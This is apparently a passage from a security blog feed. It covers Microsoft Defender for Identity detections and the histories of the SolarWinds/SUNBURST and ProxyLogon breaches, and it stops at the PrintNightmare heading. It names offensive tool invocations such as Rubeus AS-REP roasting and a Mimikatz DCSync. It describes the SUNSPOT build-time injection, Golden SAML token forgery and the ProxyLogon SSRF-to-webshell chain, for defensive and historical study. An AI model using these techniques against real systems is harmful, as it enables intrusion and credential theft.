Not as one alert per ESC class. The MDI Certificates posture page documents **nine ADCS posture assessments** -- ESC1 (Preview), ESC2, ESC3, ESC4 (template-owner and template-ACL variants), ESC6 (Preview), ESC7, ESC8, ESC11, and ESC15 [@mslearn-mdi-certificates-posture]. The runtime detection surface for the ESC8 NTLM-relay class is the *Suspected NTLM relay attack* alert in the XDR catalogue [@mslearn-mdi-alerts-xdr]. PKINIT-class runtime detection (the post-ESC8 chain) is the AS-REQ encryption-type fingerprint that Synacktiv documented and partially evaded; the August 2023 AD CS sensor release is the prerequisite for posture coverage [@mstc-adcs-sensor][@synacktiv-pkinit-evasion][@synacktiv-pkinit-evasion-archive]. Coverage is &quot;nine posture assessments plus one runtime alert,&quot; not &quot;one alert per ESC1 through ESC15.&quot;

Microsoft has never published the canonical list; community reverse-engineering is the only source. See the *honest provenance of the ETW provider list* Aside in Section 5 for the full provenance (Synacktiv&apos;s November 2022 primer; Olaf Hartong&apos;s FalconForce MDE Internals 0x02 methodology; the Get-TraceLoggingMetadata + Sealighter toolchain) and the snapshot-not-ground-truth framing [@synacktiv-primer-mdi][@falconforce-mde-0x02].

In the cloud since Azure ATP went GA in March 2018 [@mstc-azureatp-ga][@mstc-azureatp-intro]. The on-DC sensor is a thin parser that captures Kerberos / NTLM / LDAP / DRSUAPI on the wire, parses the protocols into structured events, and streams the parsed signal to the multi-tenant cloud backend over HTTPS. The detection logic, the per-principal behavioural baselines, and the alert-emission pipeline all run in the cloud. The legacy on-prem ATA Center model ended with Azure ATP; ATA itself shipped its last release (1.9.3) in September 2020 and Extended Support ends January 2026 [@mstc-ata-eol][@atadocs-versions].

No. The framing is parallel evolution, not a &quot;forcing&quot; relationship. BloodHound CE expanded ADCS attack-path coverage substantially in 2024 and 2025; during the same window MDI extended its ADCS posture assessment surface and added the AD CS sensor release in August 2023 [@mstc-adcs-sensor][@dirteam-sander-aug2023]. Both product communities watch each other -- the Defender team uses BloodHound to red-team its own environments, the SpecterOps team uses MDI when consulting in enterprise Microsoft shops -- but the causal claim &quot;BloodHound forced MDI&quot; is not supported by the public release record. The two communities&apos; work has been concurrent and mutually informing.

Almost. The MITRE-aligned alert catalogue in Section 6.2 covers the most-prevalent offensive primitives. Section 8 names the five structural ceilings that remain by-construction unclosable; *almost* is the load-bearing word.
&lt;p&gt;Friday, 14:35. The watcher on the domain controller has written three named alerts into the Defender XDR queue. The red-team contractor&apos;s &lt;code&gt;Rubeus.exe asreproast&lt;/code&gt; fired &lt;em&gt;Suspected AS-REP Roasting attack&lt;/em&gt; (T1558.004). The junior auditor&apos;s &lt;code&gt;bloodhound-python -c All&lt;/code&gt; fired &lt;em&gt;Security principal reconnaissance (LDAP)&lt;/em&gt;. The Mimikatz DCSync against the SQL host&apos;s service account fired &lt;em&gt;Suspected DCSync attack -- replication of directory services&lt;/em&gt;, External ID 2006, T1003.006. Three alerts. Three MITRE technique IDs. Three rows in a Tier 1 analyst&apos;s queue.&lt;/p&gt;
&lt;p&gt;The watcher&apos;s job is done. Whether the analyst opens the right one first, whether the Tier 2 escalation happens inside the one-hour SLA, whether the response action gets approved before the attacker has moved on -- none of that is MDI&apos;s problem to solve. It is yours.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;microsoft-defender-for-identity-the-defensive-ad-stack-that-sees-what-bloodhound&quot; keyTerms={[
  { term: &quot;DCSync&quot;, definition: &quot;An offensive primitive in which a principal with replication rights uses DRSUAPI&apos;s IDL_DRSGetNCChanges to extract password hashes from a DC; MDI alert External ID 2006, MITRE T1003.006.&quot; },
  { term: &quot;DCShadow&quot;, definition: &quot;Registering a rogue DC via nTDSDSA object creation plus SPN registration, then writing arbitrary updates via legitimate DRSUAPI replication; MDI alerts External ID 2028 and 2029, MITRE T1207.&quot; },
  { term: &quot;Golden Ticket&quot;, definition: &quot;A forged Kerberos TGT minted with the stolen krbtgt key, valid for any principal in the domain; MDI catches via encryption-downgrade and forged-authorisation-data anomalies, MITRE T1558.001.&quot; },
  { term: &quot;Sapphire Ticket&quot;, definition: &quot;A Golden Ticket whose PAC is bit-for-bit identical to a legitimate principal&apos;s PAC (via S4U2self plus U2U PAC copy); cryptographically indistinguishable from a genuine ticket, structurally invisible to PAC-anomaly detectors.&quot; },
  { term: &quot;Lateral Movement Path (LMP)&quot;, definition: &quot;A graph-anchored attack chain through Active Directory; the ATA 1.9 LMP report (March 2018) shipped on SAM-R discovery, which was deprecated in May 2025 via MC1073068.&quot; },
  { term: &quot;Directory Service Account (DSA)&quot;, definition: &quot;The gMSA the MDI v2.x sensor uses for forest-wide AD reads; replaced by LocalSystem impersonation in the v3.x sensor.&quot; },
  { term: &quot;MDI sensor v3.x&quot;, definition: &quot;The October 2025 MDE-integrated sensor; requires Windows Server 2019+, ships inside the MDE SENSE service, capped at 30 percent CPU and 1.5 GB RAM per DC.&quot; },
  { term: &quot;Identity Security Posture Assessment&quot;, definition: &quot;MDI&apos;s posture (non-runtime) detection surface; the AD CS subset enumerates nine ESC posture assessments aligned to the SpecterOps Certified Pre-Owned vocabulary.&quot; },
  { term: &quot;KQL hunting graph&quot;, definition: &quot;The Defender XDR interactive attack-path visualisation surface that operates over the unified hunting schema; the post-LMP replacement for graph-anchored identity attack-path analysis.&quot; },
  { term: &quot;Identity Explorer (Preview)&quot;, definition: &quot;The April 2026 Sentinel-data-lake-backed identity-attack-path surface in the Defender XDR Identity page; uses the hunting graph to visualise lateral movement, privilege escalation, and credential-access risks.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>active-directory</category><category>microsoft-defender</category><category>identity-protection</category><category>threat-detection</category><category>kerberos</category><category>attack-paths</category><category>soc-operations</category><category>windows-security</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>The Thirteen Months That Made Zero Trust Unavoidable: The Windows Security Wars Part 5 (2020-2023)</title><link>https://paragmali.com/blog/the-thirteen-months-that-made-zero-trust-unavoidable-the-win/</link><guid isPermaLink="true">https://paragmali.com/blog/the-thirteen-months-that-made-zero-trust-unavoidable-the-win/</guid><description>Four incidents in thirteen months -- SolarWinds, ProxyLogon, PrintNightmare, Log4Shell -- broke four Windows architectural assumptions and forced the Zero Trust pivot the industry had on the shelf since August 2020.</description><pubDate>Wed, 27 May 2026 00:00:00 GMT</pubDate><content:encoded>
Four incidents in thirteen months -- SolarWinds (December 2020), ProxyLogon (March 2021), PrintNightmare (June-July 2021), and Log4Shell (December 2021) -- broke four assumptions the Windows blue team had quietly elevated to invariants: that signed vendor updates are trustworthy, that on-premises server fleets are bounded by the firewall, that legacy SYSTEM services on Domain Controllers are not on the attack surface, and that transitive dependencies are knowable. The architectural pivot was already on the shelf: NIST SP 800-207, *Zero Trust Architecture*, shipped in August 2020, four months before SolarWinds. The defensive primitives that operationalized it -- Microsoft Pluton, the Windows 11 hardware baseline, Conditional Access with Continuous Access Evaluation and the Primary Refresh Token, and the LSA Protection and Vulnerable Driver Blocklist defaults -- shipped at scale through 2022-2023. The trust roots are still not closed; Storm-0558 (July 2023) is the existence proof that the policy engine itself is a privileged plane. That is Part 6.
&lt;h2&gt;1. Eighteen Thousand Signatures, All Valid&lt;/h2&gt;
&lt;p&gt;On December 13, 2020 -- a Sunday -- Mandiant Threat Intelligence pushed a blog post to FireEye&apos;s website titled &quot;Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor.&quot; The post named a single binary, &lt;code&gt;SolarWinds.Orion.Core.BusinessLayer.dll&lt;/code&gt;, that had been digitally signed by SolarWinds&apos; legitimate code-signing certificate and distributed through SolarWinds&apos; own update server between February and June 2020 [@mandiant-sunburst]. The next day, SolarWinds filed a Form 8-K with the U.S. Securities and Exchange Commission stating that the actual number of customers who installed the updates between March and June 2020 was fewer than 18,000 [@solarwinds-sec-edgar].&lt;/p&gt;
&lt;p&gt;Two months after that, Microsoft President Brad Smith testified to the U.S. Senate Select Committee on Intelligence that the number of follow-on victims who had been targeted with further lateral movement -- via a token-forgery primitive against Active Directory Federation Services -- was fewer than 100 [@senate-intel-2021-02-23].&lt;/p&gt;
&lt;p&gt;The architectural lesson is in the gap between those two numbers. Eighteen thousand organizations validated the &lt;a href=&quot;https://paragmali.com/blog/authenticode-and-catalog-files-the-crypto-foundation-under-w/&quot; rel=&quot;noopener&quot;&gt;Authenticode signature&lt;/a&gt; on a binary [@ms-authenticode], executed it as trusted code, and did exactly what an endpoint protection product is specified to do: nothing, because the binary was signed by a vendor on the trusted publisher list. The attacker then chose roughly one hundred targets to pursue further. The signature was real. The build pipeline that produced the signature was compromised. Ken Thompson&apos;s 1983 Turing Award lecture &quot;Reflections on Trusting Trust,&quot; published in &lt;em&gt;Communications of the ACM&lt;/em&gt; in August 1984, had predicted this exact class thirty-six years earlier [@thompson-1984-acm, @thompson-nakamoto-reading]; in December 2020 the Windows industry collected the receipt.&lt;/p&gt;

This is the largest and most sophisticated attack the world has ever seen ... we have seen substantial evidence that points to the Russian foreign intelligence agency, and we have found no evidence that leads us anywhere else. -- Brad Smith, Microsoft President, U.S. Senate Select Committee on Intelligence, February 23, 2021 [@senate-intel-2021-02-23]
&lt;p&gt;SolarWinds was the first of four incidents the Windows blue team did not have a vocabulary for. ProxyLogon arrived in March 2021 and broke the assumption that on-premises Exchange Server fleets were bounded by the corporate firewall. PrintNightmare arrived in June-July 2021 and broke the assumption that legacy services running as SYSTEM on Domain Controllers were not on the attack surface. Log4Shell arrived in December 2021 and broke the assumption that &quot;what software is in my fleet&quot; was an answerable question.&lt;/p&gt;
&lt;p&gt;Four incidents. Thirteen months. Four assumptions that the prior decade had quietly elevated to invariants. If the signature was real and the build was compromised, then &quot;protect the endpoint&quot; was protecting the wrong thing. Where did the threat model go?&lt;/p&gt;
&lt;h2&gt;2. Why 2020 Was the Inflection Point&lt;/h2&gt;
&lt;p&gt;The four incidents did not happen because 2020 was uniquely insecure. They happened because the structural conditions had been gathering for a decade, and three of them converged that year.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The endpoint-protection era&apos;s high-water mark.&lt;/strong&gt; By 2019, the operational consensus across Windows fleets was that endpoint-centric defense-in-depth had become tractable. &lt;a href=&quot;https://paragmali.com/blog/the-empty-hash-credential-guard-the-lsaiso-trustlet-and-the-/&quot; rel=&quot;noopener&quot;&gt;Credential Guard&lt;/a&gt; (2015) isolated LSASS secrets in a virtualization-based enclave [@ms-credential-guard]. Windows Defender ATP (2016) streamed kernel-level telemetry to a security operations centre. &lt;a href=&quot;https://paragmali.com/blog/ad-is-a-graph-how-bloodhound-made-defenders-think-like-attac/&quot; rel=&quot;noopener&quot;&gt;BloodHound&lt;/a&gt; (2016) made the on-premises Active Directory graph queryable as attack paths rather than as object permissions [@bloodhound-specterops]. Device Guard and &lt;a href=&quot;https://paragmali.com/blog/wdac--hvci-code-integrity-at-every-layer-in-windows/&quot; rel=&quot;noopener&quot;&gt;WDAC&lt;/a&gt; (2017) constrained kernel and userspace code identity. The threat model was the endpoint. The perimeter was the VPN. The build pipeline was the vendor&apos;s problem. The cloud identity layer was Conditional Access on a handful of policies. The blue team&apos;s frame of reference was finite and bounded.&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s 2021 Digital Defense Report framed the post-event detection posture honestly: the industry had become good at &lt;em&gt;finding&lt;/em&gt; attackers after the fact, less good at &lt;em&gt;stopping&lt;/em&gt; them at first execution [@mddr-2021-specific]. Detection and response as the load-bearing primitive is precisely the posture that SolarWinds invalidated -- because the binary that ran was the one the EDR was specified to trust.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The pandemic-era expansion of the attack surface.&lt;/strong&gt; From March 2020 onward, remote work shifted authentication to cloud identity providers, exposed VPN and RDP gateways at unprecedented scale, and made internet-facing Exchange near-universal in the mid-market. None of this &lt;em&gt;caused&lt;/em&gt; SolarWinds -- the SolarWinds build-pipeline access had begun in September 2019 -- but it reshaped which incidents had the most operational impact when they landed. An Exchange Server fleet that had been ten internal users behind a VPN in 2019 was a hundred external users on the public internet in 2021. ProxyLogon would have been a serious incident in 2019. In 2021 it was a federal emergency.&lt;/p&gt;

An attack in which an adversary alters software, hardware, or services *before* the legitimate vendor delivers them, so that the eventual victim trusts the malicious artifact by virtue of trusting the vendor&apos;s identity. The compromise can occur at the source (commit signing keys), the build (the compiler or build server), the distribution (the update channel), or the installation (the package manager). SUNBURST was a *build-pipeline* compromise: SolarWinds&apos; source remained clean; the build server inserted SUNBURST code into the compiled artifact, then signed it with SolarWinds&apos; legitimate code-signing certificate.
&lt;p&gt;&lt;strong&gt;The state of supply-chain assurance circa 2020.&lt;/strong&gt; SLSA, the framework that would later codify &quot;what does it mean for a build to be trustworthy&quot; [@google-slsa-2021-06-16, @slsa-v1-levels], did not yet exist; Google announced it in June 2021. Reproducible builds were a research aspiration on a handful of Linux distributions. CycloneDX [@cyclonedx-home] and SPDX [@spdx-home] existed as bill-of-materials specifications but had no federal mandate behind them. in-toto [@in-toto-home] was the only deployed cryptographic-attestation framework for build steps, and adoption was minimal. Executive Order 14028, which would make Software Bill of Materials provision a federal procurement requirement, was still six months away [@eo-14028]. The build pipeline was not threat-modeled as attacker territory because no one had a name for the territory yet.&lt;/p&gt;
&lt;p&gt;The same 2020-2023 window also produced a parallel criminal-economy track this article does not walk operationally: the human-operated ransomware cluster of Conti, REvil, DarkSide, and BlackCat / ALPHV, and the supply-chain-adjacent ransomware incidents Colonial Pipeline (May 2021, DarkSide), JBS Foods (May 2021, REvil), and Kaseya VSA (July 2, 2021, REvil). Kaseya is the non-Microsoft supply-chain parallel to SolarWinds: compromise the MSP-tier remote-monitoring platform, downstream MSPs and their customers receive trojanized commands, an architectural class that is not Microsoft-specific [@kaseya-ic3-csa-pdf-substitute]. The canonical primaries are CISA / FBI / NSA / USSS Joint Advisory AA21-265A on Conti [@conti-aa21-265a-wayback], the July 6, 2021 CISA-FBI Kaseya guidance [@kaseya-ic3-csa-pdf-substitute], the April 2022 FBI Flash and CISA alert on BlackCat / ALPHV [@cisa-blackcat-alert-substitute], and the February 2022 US/UK/AU joint ransomware advisory AA22-040A [@cisa-aa22-040a]. Microsoft&apos;s canonical framing for &quot;human-operated ransomware&quot; lives in the Digital Defense Report 2022 Cybercrime chapter [@mddr-2022]; readers wanting the operational ransomware-economy treatment should start there.&lt;/p&gt;
&lt;p&gt;Taken together, these three threads produced an industry in which the trust-anchor primitives (signed code, perimeter firewalls, default-enabled SYSTEM services, &quot;what library are we using&quot;) had all been quietly elevated to invariants while the conditions that made them invariant were eroding. The four incidents are not four bugs; they are four exposures of those four assumptions. The next section walks each in turn.&lt;/p&gt;
&lt;h2&gt;3. The Four Incidents&lt;/h2&gt;
&lt;h3&gt;3.1 SolarWinds / SUNBURST: Supply Chain at Silicon&lt;/h3&gt;
&lt;p&gt;Five days before Mandiant published the SUNBURST analysis, FireEye&apos;s CEO Kevin Mandia disclosed that &quot;a highly sophisticated state-sponsored adversary&quot; had stolen FireEye&apos;s internal Red Team tooling [@mandiant-fireeye-rt-tools]. The disclosure triggered an internal investigation that traced the access path through FireEye&apos;s own SolarWinds Orion deployment. By the time Mandiant pushed the December 13 blog, the chain was named, the affected DLL was identified, and the federal response was already moving: CISA&apos;s Emergency Directive 21-01 went out the same day, ordering every Federal Civilian Executive Branch agency to disconnect or power down SolarWinds Orion products [@cisa-ed-21-01].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The exploit chain.&lt;/strong&gt; The SolarWinds build pipeline had been compromised since approximately September 2019, eight months before the trojanized builds reached customers [@solarwinds-orange-matter-sunburst]. Between February and June 2020, the SolarWinds release process produced four signed versions of Orion that contained additional code added during the build itself, after the source was clean but before the artifact was signed. The compromised builds embedded a backdoor Mandiant named SUNBURST inside &lt;code&gt;SolarWinds.Orion.Core.BusinessLayer.dll&lt;/code&gt; [@mandiant-sunburst]. SUNBURST was deliberately quiet: it slept for up to two weeks after install, camouflaged its callback traffic as legitimate Orion telemetry, generated its command-and-control hostnames from a domain-generation algorithm rooted at &lt;code&gt;avsvmcloud.com&lt;/code&gt;, and ignored any host whose environment matched the attacker&apos;s exclusion list (which included most security vendors and some forensic tooling). On selected targets, SUNBURST loaded a second-stage Cobalt Strike beacon named TEARDROP [@mandiant-sunburst] or its variant Raindrop [@symantec-raindrop-2021], and from there the attacker pursued domain compromise of the on-premises Active Directory.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;SUNSPOT: the build-time injector.&lt;/strong&gt; Mandiant&apos;s December 13 post named the SUNBURST artifact but did not yet describe &lt;em&gt;how&lt;/em&gt; the trojanized DLL got into the build. On January 11, 2021, CrowdStrike Intelligence published an analysis of the injector itself, codenamed SUNSPOT, co-published with SolarWinds&apos; own root-cause investigation update [@crowdstrike-sunspot, @solarwinds-orange-matter-sunburst]. SUNSPOT was a Windows binary present on the SolarWinds build server as &lt;code&gt;taskhostsvc.exe&lt;/code&gt;. It monitored running processes for &lt;code&gt;MsBuild.exe&lt;/code&gt;, walked the new process&apos;s environment to find the directory of the Orion Visual Studio solution, located the source file &lt;code&gt;InventoryManager.cs&lt;/code&gt;, replaced its contents on disk with a SUNBURST-bearing version just before the C# compiler read the file, waited for the build to finish, then atomically restored the original file. Because the substitution happened in the narrow window between MsBuild reading the source and the compiler emitting the binary, the source repository at rest never showed evidence. The artifact on disk after the build looked exactly like the artifact a clean build would have produced -- except that the compiled bytes embedded SUNBURST.&lt;/p&gt;

The build-time injector CrowdStrike identified as the SolarWinds-side companion to SUNBURST [@crowdstrike-sunspot]. SUNSPOT is the operational realization at production scale of the threat model Ken Thompson described in 1984: the build process is the trust boundary, and an attacker who controls the build process produces an artifact whose signature is correct but whose semantics are not what the source code says.
&lt;p&gt;The on-premises compromise was the means. The cloud pivot was the end. Once the attacker controlled the on-premises ADFS server&apos;s token-signing private key, the chain shifted to Golden SAML.&lt;/p&gt;

A token-forgery technique introduced by Shaked Reiner of CyberArk Labs in November 2017 [@reiner-2017-cyberark]. If an attacker obtains the token-signing private key of a SAML 2.0 identity provider (typically the on-premises Active Directory Federation Services token-signing certificate), the attacker can forge a SAMLResponse for any user, with any group memberships, valid for any duration. Service providers that trust the federation cannot distinguish forged tokens from legitimate ones. Reiner published a reference implementation called `shimit` alongside the disclosure [@cyberark-shimit-gh]. The naming is a deliberate parallel to Mimikatz&apos;s Golden Ticket against Kerberos.

The first-stage backdoor that Mandiant identified inside `SolarWinds.Orion.Core.BusinessLayer.dll` in December 2020 [@mandiant-sunburst, @solarwinds-sec-edgar]. SUNBURST established initial command and control over HTTPS, blending into the volume of telemetry that legitimate Orion deployments generated.

sequenceDiagram
    participant SUNSPOT as SUNSPOT on SolarWinds build server
    participant Build as SolarWinds MsBuild process
    participant Customer as Customer Orion Server
    participant C2 as avsvmcloud DGA C2
    participant ADFS as On-prem ADFS
    participant M365 as Microsoft 365
    SUNSPOT-&amp;gt;&amp;gt;Build: Replace InventoryManager.cs at compile time
    Build-&amp;gt;&amp;gt;Customer: Signed Orion update with SUNBURST DLL
    Customer-&amp;gt;&amp;gt;Customer: Authenticode validates signature, executes
    Customer-&amp;gt;&amp;gt;C2: HTTPS beacon disguised as Orion telemetry
    C2-&amp;gt;&amp;gt;Customer: TEARDROP or Raindrop second-stage loader
    Customer-&amp;gt;&amp;gt;ADFS: Lateral movement, extract token-signing key
    ADFS-&amp;gt;&amp;gt;ADFS: Attacker forges SAMLResponse offline
    ADFS-&amp;gt;&amp;gt;M365: Golden SAML token for chosen identity
    M365-&amp;gt;&amp;gt;M365: Federated trust accepts forged assertion
    Note over Customer,M365: Approximately 100 targeted follow-on victims out of 18,000 SUNBURST recipients
&lt;p&gt;&lt;strong&gt;Blast radius.&lt;/strong&gt; SolarWinds&apos; December 14 Form 8-K stated that fewer than 18,000 customers installed the trojanized updates between March and June 2020 [@solarwinds-sec-edgar]. Brad Smith&apos;s February 23 Senate testimony placed the count of follow-on victims pursued via lateral movement at fewer than 100 [@senate-intel-2021-02-23]. On April 15, 2021, the White House formally attributed the operation to the Russian Foreign Intelligence Service (SVR), with coincident sanctions and the expulsion of ten Russian diplomats [@wh-fact-sheet-svr-attribution]. The activity cluster Mandiant had originally tracked as UNC2452 was merged into APT29 in May 2022 [@mandiant-apt29-merge]; Microsoft&apos;s Nobelium designation was retired on April 18, 2023 in favor of &quot;Midnight Blizzard&quot; under the new weather-themed actor-naming scheme [@ms-actor-naming-2023].&lt;/p&gt;
&lt;p&gt;The renaming pile-up matters operationally. Detection rules written against &quot;UNC2452&quot; in early 2021, against &quot;APT29&quot; after May 2022, and against &quot;Midnight Blizzard&quot; after April 2023 all reference the same actor cluster, but tooling and queries that anchor on a single name miss the others. Mandiant&apos;s SUNBURST countermeasure repository preserves the original IOCs [@mandiant-sunburst-countermeasures-gh].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Vendor response and federal action.&lt;/strong&gt; CISA&apos;s January 8, 2021 Cybersecurity Advisory AA21-008A was the first federal advisory to name forged authentication tokens, federated identity bypass, and cloud-side persistence as a coherent detection priority [@cisa-aa21-008a]. CISA released an open-source detection tool, Sparrow, with the advisory. SolarWinds shipped Orion 2020.2.1 HF 2 as the hotfix sequence. The April 13, 2021 Department of Justice action against ProxyLogon web shells (covered in the next subsection) and the April 15 White House attribution and sanctions package effectively closed the public-sector response cycle within four months of the December 13 disclosure.&lt;/p&gt;

In his 1983 Turing Award lecture, published in *Communications of the ACM* in August 1984, Ken Thompson described a self-referential modification to a compiler that produced a backdoor in any program the compiler subsequently compiled, including future copies of the compiler itself [@thompson-1984-acm, @thompson-nakamoto-reading]. The construction has a property that is easy to state and hard to confront: no amount of source-code auditing reveals the backdoor, because the backdoor is not in any source code. It is in the compiler&apos;s behavior.&lt;p&gt;SUNBURST is not the same construction. The compromise was at the build server rather than the compiler, and the attacker&apos;s code was added to the artifact rather than inserted by a self-replicating modification. The relevant similarity is architectural rather than mechanical. In both cases the trust anchor (the compiler in Thompson&apos;s lecture, the publisher&apos;s code-signing certificate in SUNBURST) was doing exactly what it was specified to do. The auditor of a backdoored binary cannot find the backdoor in the source. The customer of a backdoored vendor cannot find the backdoor in the signature. The chain of evidence is intact at the level the verifier is checking; the failure is at a level the verifier was never specified to check.&lt;/p&gt;
&lt;p&gt;Thompson&apos;s closing sentence -- &quot;You can&apos;t trust code that you did not totally create yourself&quot; -- reads in 1984 as a thought experiment and in 2020 as an operational claim about the build pipelines of every software vendor in the Authenticode trust list.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Signed code from your vendor is not trustworthy if your vendor&apos;s build pipeline is compromised. Authenticode signs the publisher&apos;s binary; it does not sign the build that produced the binary. The eighteen thousand SUNBURST recipients did exactly what their endpoints were specified to do.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If the entry was a signed update from a trusted vendor, the entry was inside the perimeter before the perimeter was tested. The second incident showed what happens when the entry &lt;em&gt;is&lt;/em&gt; the perimeter.&lt;/p&gt;
&lt;h3&gt;3.2 HAFNIUM / ProxyLogon: The Front-End That Pre-Authenticated for the Back-End&lt;/h3&gt;
&lt;p&gt;Two independent researcher pipelines converged on the same Exchange vulnerability chain within days of each other in January 2021. Volexity&apos;s Steven Adair and team observed exploitation activity against customer Exchange Server deployments as early as January 6, 2021 -- a date Volexity later revised to January 3, 2021 in their March 8 update to &quot;Operation Exchange Marauder&quot; [@volexity-exchange-marauder]. Both January dates are &lt;em&gt;earliest-observed exploitation&lt;/em&gt; dates, not detection or zero-day-identification dates; the chain was already in operator hands when Volexity&apos;s customer-side incident-response telemetry surfaced it. DEVCORE&apos;s Cheng-Da &quot;Orange Tsai&quot; Tsai arrived at the same chain independently through code review and reported it to MSRC on January 5 [@orange-tsai-proxylogon]. Both reports landed at Microsoft Security Response Center; both researchers held the disclosure as MSRC worked on a patch. On March 2, 2021 -- a Tuesday, but not a Patch Tuesday -- Microsoft shipped out-of-band updates for all supported Exchange Server versions [@msft-hafnium-blog].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The exploit chain.&lt;/strong&gt; The audit-correct shape of the chain is &lt;em&gt;three&lt;/em&gt; CVEs, not four. CVE-2021-26855 is a server-side request forgery in the Exchange Server front-end that allows an unauthenticated attacker to send requests to the back-end as if the requester were Exchange itself [@nvd-cve-2021-26855]. CVE-2021-27065 is a post-authentication arbitrary file write that the attacker reaches &lt;em&gt;via&lt;/em&gt; the SSRF, allowing an attacker-chosen ASPX web shell to be written to a server-controlled directory [@tenable-exchange-zd]. The shell then executes under the Exchange process identity, which is SYSTEM. A separate file-write primitive (CVE-2021-26858) provides a parallel path to the same web-shell drop after authentication.&lt;/p&gt;

A class of vulnerability in which an attacker induces a server to issue requests on the attacker&apos;s behalf, typically to internal resources that the attacker could not reach directly. CVE-2021-26855 was an SSRF in the Exchange Server front-end (the Client Access role): a forged X-BEResource cookie caused the front-end to proxy attacker-supplied requests to the Exchange back-end with the proxy&apos;s own authentication context, bypassing the Exchange authentication boundary entirely.
&lt;p&gt;CVE-2021-26857 sits in a parallel position. It is an insecure deserialization in Exchange&apos;s Unified Messaging service that yields code execution as SYSTEM, but only &lt;em&gt;to an attacker who already holds administrator rights or has chained another vulnerability to obtain them&lt;/em&gt; [@tenable-exchange-zd]. It does not require the SSRF step. Treating ProxyLogon as a single linear chain of four CVEs is the common simplification; the audit-correct framing is three CVEs in the linear SSRF-to-web-shell path and one separate authenticated RCE primitive in a parallel position.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The &quot;four chained zero-days&quot; shorthand collapses two distinct attack-class shapes and obscures the SSRF-as-load-bearing-primitive observation. The chain that proxies through 26855 does not pass through 26857; 26857 was an independent RCE primitive available to an attacker who already held Exchange administrator rights (or chained another vulnerability to obtain them), which is a different threat-model class from the pre-auth SSRF.&lt;/p&gt;
&lt;/blockquote&gt;

flowchart TD
    A[Unauthenticated attacker] --&amp;gt; B[CVE-2021-26855 SSRF on front-end]
    B --&amp;gt; C[Forged backend-auth cookie]
    C --&amp;gt; D[CVE-2021-27065 or CVE-2021-26858 arbitrary file write]
    D --&amp;gt; E[ASPX web shell on disk]
    E --&amp;gt; F[SYSTEM-level RCE]
    subgraph Parallel
    G[Authenticated user] --&amp;gt; H[CVE-2021-26857 Unified Messaging deserialization]
    H --&amp;gt; F
    end
&lt;p&gt;&lt;strong&gt;Blast radius.&lt;/strong&gt; Pre-patch numbers come from two separate primaries. Brian Krebs reported on March 5, 2021 that &quot;at least 30,000&quot; U.S. organizations had been compromised [@krebs-hafnium-march5]. Bloomberg&apos;s March 7 reporting placed the worldwide figure at &quot;as many as 60,000&quot; organizations [@krebs-hafnium-march5]. After Microsoft&apos;s March 2 patch shipped, the chain was widely weaponized by additional actor groups -- LuckyMouse, Tick, Calypso, Winnti, and others -- per ESET&apos;s March 10, 2021 enumeration of at least ten APT groups exploiting the same chain [@eset-exchange-10apt-2021]; the aggregate count of post-patch compromised servers ran toward 250,000 in the following weeks per Krebs&apos;s contemporaneous reporting on hundreds-of-thousands-class Exchange server compromise globally [@krebs-hafnium-march5]. That 250,000 figure is widely cited but it aggregates &lt;em&gt;post-patch&lt;/em&gt; indiscriminate exploitation; it is not a pre-patch numerator. Microsoft attributed the original campaign to a Chinese state-sponsored actor it named HAFNIUM, later renamed Silk Typhoon under the weather-themed scheme in April 2023 [@msft-hafnium-blog, @ms-actor-naming-2023].&lt;/p&gt;
&lt;p&gt;HAFNIUM became Silk Typhoon at the same April 18, 2023 rename pass that made Nobelium into Midnight Blizzard [@ms-actor-naming-2023]. Microsoft&apos;s threat-actor naming history matters because mid-cycle renames can fragment detection coverage; rules keyed on the old name will silently stop matching new advisories.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Vendor response and federal action.&lt;/strong&gt; Beyond the March 2 out-of-band patches, Microsoft released a one-click mitigation tool on March 8 and the Exchange On-premises Mitigation Tool on March 15. The Department of Justice and FBI then took an unprecedented step.&lt;/p&gt;

On April 13, 2021, the U.S. Department of Justice announced that the FBI had executed a court-authorized operation under Rule 41 of the Federal Rules of Criminal Procedure to access compromised on-premises Exchange servers in the United States, copy the attacker-installed web shells, and remove them -- without the system owners&apos; prior consent or notification [@doj-fbi-rule41-pr, @hunton-fbi-rule41]. Owners were notified afterward.&lt;p&gt;The legal mechanism is worth pausing on. Rule 41, as amended in 2016, allows a single magistrate judge to authorize searches of computers whose location is unknown or whose location is in five or more judicial districts. The April 13 operation was the first major use of that authority to &lt;em&gt;remediate&lt;/em&gt; third-party systems at scale, rather than to investigate. The precedent matters: every subsequent federal incident response that contemplates active intervention on private systems sits in the shadow of this order.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;p&gt;The architectural lesson is at the level of the product design. Exchange Server&apos;s front-end and back-end were specified to communicate over an authenticated trust boundary inside a single deployment. CVE-2021-26855 made the front-end act as the attacker&apos;s proxy &lt;em&gt;into&lt;/em&gt; the back-end; the SSRF did not bypass the trust boundary, it relocated to its server-side end and walked through it. On-premises server fleets that organizations control are still on the public internet, and the entry-point class is &quot;the front-end proxy that pre-authenticates traffic for the back-end.&quot;&lt;/p&gt;
&lt;p&gt;If the supply-chain class compromised the signed code on the endpoint, the on-premises server class compromised the boundary readers thought was between the endpoint and the internet. The third incident compromised the boundary &lt;em&gt;inside&lt;/em&gt; the perimeter.&lt;/p&gt;
&lt;h3&gt;3.3 PrintNightmare: The Legacy SYSTEM Service on Every Domain Controller&lt;/h3&gt;
